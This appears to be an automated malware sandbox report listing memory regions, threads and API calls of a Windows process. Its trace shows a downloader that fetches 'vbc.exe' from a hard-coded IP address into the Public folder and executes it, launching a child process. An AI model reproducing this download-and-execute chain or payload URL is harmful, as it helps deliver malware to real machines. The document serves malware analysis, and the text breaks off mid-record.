region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 936 start_va = 0x2360000 end_va = 0x2360fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002360000" filename = "" Region: id = 937 start_va = 0x2b80000 end_va = 0x2c3bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b80000" filename = "" Region: id = 938 start_va = 0x2360000 end_va = 0x2363fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002360000" filename = "" Region: id = 939 start_va = 0x6f880000 end_va = 0x6f89cfff monitored = 0 entry_point = 0x6f883b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 940 start_va = 0x2370000 end_va = 0x2373fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 941 start_va = 0x2380000 end_va = 0x2380fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002380000" filename = "" Region: id = 942 start_va = 0x23a0000 end_va = 0x23a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023a0000" filename = "" Region: id = 943 start_va = 0x2c40000 end_va = 0x3131fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c40000" filename = "" Region: id = 944 start_va = 0x3140000 end_va = 0x417ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 945 start_va = 0x23b0000 end_va = 0x23b4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 946 start_va = 0x4180000 end_va = 0x69b5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 948 start_va = 0x703b0000 end_va = 0x7052dfff monitored = 0 entry_point = 0x7042c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 949 start_va = 0x71af0000 end_va = 0x71dbafff monitored = 0 entry_point = 0x71d2c4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 950 start_va = 0x23c0000 end_va = 0x23c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 951 start_va = 0x701a0000 end_va = 0x703acfff monitored = 0 entry_point = 0x7028acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 952 start_va = 0x23d0000 end_va = 0x23d0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 953 start_va = 0x75e90000 end_va = 0x75eeefff monitored = 0 entry_point = 0x75e94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 954 start_va = 0x70170000 end_va = 0x70181fff monitored = 0 entry_point = 0x70174510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 955 start_va = 0x71970000 end_va = 0x7199efff monitored = 0 entry_point = 0x7197bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 956 start_va = 0x700d0000 end_va = 0x7016afff monitored = 0 entry_point = 0x7010f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 957 start_va = 0x69c0000 end_va = 0x69fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000069c0000" filename = "" Region: id = 958 start_va = 0x6a00000 end_va = 0x6afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 959 start_va = 0x71a70000 end_va = 0x71abefff monitored = 0 entry_point = 0x71a7d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 960 start_va = 0x6b00000 end_va = 0x6bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 961 start_va = 0x700c0000 end_va = 0x700c7fff monitored = 0 entry_point = 0x700c1fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 962 start_va = 0x74610000 end_va = 0x74616fff monitored = 0 entry_point = 0x74611e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 963 start_va = 0x23e0000 end_va = 0x23e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023e0000" filename = "" Region: id = 964 start_va = 0x719a0000 end_va = 0x71a23fff monitored = 0 entry_point = 0x719c6530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 965 start_va = 0x6c00000 end_va = 0x6c0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006c00000" filename = "" Region: id = 966 start_va = 0x6c10000 end_va = 0x6c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c10000" filename = "" Region: id = 967 start_va = 0x6c50000 end_va = 0x6d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c50000" filename = "" Region: id = 968 start_va = 0x6d50000 end_va = 0x714afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006d50000" filename = "" Region: id = 969 start_va = 0x7150000 end_va = 0x7157fff monitored = 0 entry_point = 0x71519c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 972 start_va = 0x7150000 end_va = 0x7160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 973 start_va = 0x7170000 end_va = 0x71affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007170000" filename = "" Region: id = 974 start_va = 0x71b0000 end_va = 0x72affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000071b0000" filename = "" Region: id = 975 start_va = 0x71f20000 end_va = 0x7206afff monitored = 0 entry_point = 0x71f81660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 976 start_va = 0x72b0000 end_va = 0x72b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 977 start_va = 0x72c0000 end_va = 0x7304fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 978 start_va = 0x7310000 end_va = 0x7313fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 979 start_va = 0x7320000 end_va = 0x73adfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 980 start_va = 0x73b0000 end_va = 0x73b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000073b0000" filename = "" Region: id = 981 start_va = 0x73c0000 end_va = 0x73c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 982 start_va = 0x73d0000 end_va = 0x73e2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 983 start_va = 0x73f0000 end_va = 0x73f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000073f0000" filename = "" Region: id = 997 start_va = 0x73c0000 end_va = 0x73c7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\windows.storage.dll.mui") Region: id = 998 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 1001 start_va = 0x7400000 end_va = 0x7433fff monitored = 1 entry_point = 0x7401b18 region_type = mapped_file name = "vbc.exe" filename = "\\Users\\Public\\vbc.exe" (normalized: "c:\\users\\public\\vbc.exe") Region: id = 1002 start_va = 0x67540000 end_va = 0x6754bfff monitored = 0 entry_point = 0x67544ad0 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\SysWOW64\\pcacli.dll" (normalized: "c:\\windows\\syswow64\\pcacli.dll") Region: id = 1003 start_va = 0x67670000 end_va = 0x67685fff monitored = 0 entry_point = 0x676721d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Thread: id = 33 os_tid = 0xf9c [0149.625] GetProcAddress (hModule=0x74530000, lpProcName="ExpandEnvironmentStringsW") returned 0x7454cd50 [0149.625] ExpandEnvironmentStringsW (in: lpSrc="%PUBLIC%\\vbc.exe", lpDst=0x19eda4, nSize=0x104 | out: lpDst="C:\\Users\\Public\\vbc.exe") returned 0x18 [0149.625] LoadLibraryW (lpLibFileName="UrlMon") returned 0x703b0000 [0149.642] GetProcAddress (hModule=0x703b0000, lpProcName="URLDownloadToFileW") returned 0x7042b240 [0149.643] URLDownloadToFileW (param_1=0x0, param_2="http://103.155.83.184/wdc/vbc.exe", param_3="C:\\Users\\Public\\vbc.exe" (normalized: "c:\\users\\public\\vbc.exe"), param_4=0x0, param_5=0x0) [0150.871] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: gzip, deflate", dwHeadersLength=0xffffffff, dwModifiers=0xa0000000) [0153.633] ShellExecuteExW (pExecInfo=0x19efc8*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\Public\\vbc.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) Thread: id = 34 os_tid = 0xa14 Thread: id = 36 os_tid = 0x103c Thread: id = 37 os_tid = 0x1048 Thread: id = 38 os_tid = 0x105c Thread: id = 39 os_tid = 0x1060 Thread: id = 40 os_tid = 0x109c Thread: id = 41 os_tid = 0x10d4 Thread: id = 42 os_tid = 0x10d8 Process: id = "3" image_name = "vbc.exe" filename = "c:\\users\\public\\vbc.exe" page_root = "0xe6d2000" os_pid = "0x10ec" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xc50" cmd_line = "\"C:\\Users\\Public\\vbc.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 984 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 985 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 986 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 987 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 988 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 989 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 990 start_va = 0x400000 end_va = 0x4b9fff monitored = 1 entry_point = 0x401b18 region_type = mapped_file name = "vbc.exe" filename = "\\Users\\Public\\vbc.exe" (normalized: "c:\\users\\public\\vbc.exe") Region: id = 991 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 992 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 993 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 994 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 995 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 996 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 999 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1000 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1004 start_va = 0x680000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 1005 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1006 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1007 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1008 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1009 start_va = 0x690000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1010 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1011 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1012 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1013 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1014 start_va = 0x4c0000 end_va = 0x57dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1015 start_va = 0x73ee0000 end_va = 0x73f71fff monitored = 0 entry_point = 0x73f20380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1016 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 1017 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1018 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1019 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1020 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1021 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1022 start_va = 0x690000 end_va = 0x817fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 1023 start_va = 0x840000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1024 start_va = 0x940000 end_va = 0x969fff monitored = 0 entry_point = 0x945680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1025 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1026 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1027 start_va = 0x820000 end_va = 0x820fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 1028 start_va = 0x940000 end_va = 0xac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 1029 start_va = 0xad0000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 1030 start_va = 0x1ed0000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 1145 start_va = 0x1fa0000 end_va = 0x279ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fa0000" filename = "" Region: id = 1146 start_va = 0x830000 end_va = 0x832fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 1147 start_va = 0x830000 end_va = 0x832fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 1148 start_va = 0x1ed0000 end_va = 0x1eeafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 1149 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 1150 start_va = 0x1ef0000 end_va = 0x1f09fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 1158 start_va = 0x75e90000 end_va = 0x75eeefff monitored = 0 entry_point = 0x75e94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1159 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1160 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1161 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1162 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1163 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1171 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1172 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1173 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1174 start_va = 0x1fa0000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1175 start_va = 0x1ef0000 end_va = 0x1f80fff monitored = 0 entry_point = 0x1f28cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1176 start_va = 0x743f0000 end_va = 0x74481fff monitored = 0 entry_point = 0x74428cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1177 start_va = 0x65eb0000 end_va = 0x65f6efff monitored = 0 entry_point = 0x65ec1dfc region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\SysWOW64\\msvcr100.dll" (normalized: "c:\\windows\\syswow64\\msvcr100.dll") Region: id = 1181 start_va = 0x2060000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 1182 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1183 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1184 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1185 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1186 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1187 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1188 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1189 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1190 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1191 start_va = 0x6fe40000 end_va = 0x6fe52fff monitored = 0 entry_point = 0x6fe49950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1192 start_va = 0x6fe10000 end_va = 0x6fe3efff monitored = 0 entry_point = 0x6fe295e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1193 start_va = 0x73c30000 end_va = 0x73c4afff monitored = 0 entry_point = 0x73c39050 region_type = mapped_file name = "bcrypt.dll" filename = 